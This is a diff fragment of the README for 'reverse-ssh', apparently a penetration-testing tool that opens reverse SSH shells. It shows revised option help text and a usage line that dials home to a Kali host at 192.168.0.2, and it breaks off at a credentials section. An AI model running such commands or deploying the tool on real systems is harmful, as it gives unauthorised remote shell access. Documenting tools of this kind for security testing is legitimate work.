Fahrj/reverse-ssh/Readme.md

         reverse-ssh -v -b 0 kali@192.168.0.2

 Options:
-        -s, Shell to use for incoming connections, e.g. /bin/bash; (default: /bin/bash) for windows this can only be used to give a path to 'ssh-shellhost.exe' to enhance pre-Windows10 shells (e.g. '-s ssh-shellhost.exe' if in same directory) -l, Bind scenario only: listen at this address:port (default: :31337) -p, Reverse scenario only: ssh port at home (default: 22) -b, Reverse scenario only: bind to this port after dialling home (default: 8888) -v, Emit log output
+        -l, Start reverseSSH in listening mode (overrides reverse scenario) -p, Port at which reverseSSH is listening for incoming ssh connections (bind scenario) or where it tries to establish a ssh connection (reverse scenario) (default: 31337) -b, Reverse scenario only: bind to this port after dialling home (default: 8888) -s, Shell to spawn for incoming connections, e.g. /bin/bash; (default: /bin/bash) for windows this can only be used to give a path to 'ssh-shellhost.exe' to enhance pre-Windows10 shells (e.g. '-s ssh-shellhost.exe' if in same directory) -v, Emit log output

 <target>
         Optional target which enables the reverse scenario.
 Can be prepended with
-        <user>@ to authenticate as a different user than 'reverse' while dialling home.
+        <user>@ to authenticate as a different user other than 'reverse' while dialling home

 Credentials:
         Accepting all incoming connections from any user with either of the following: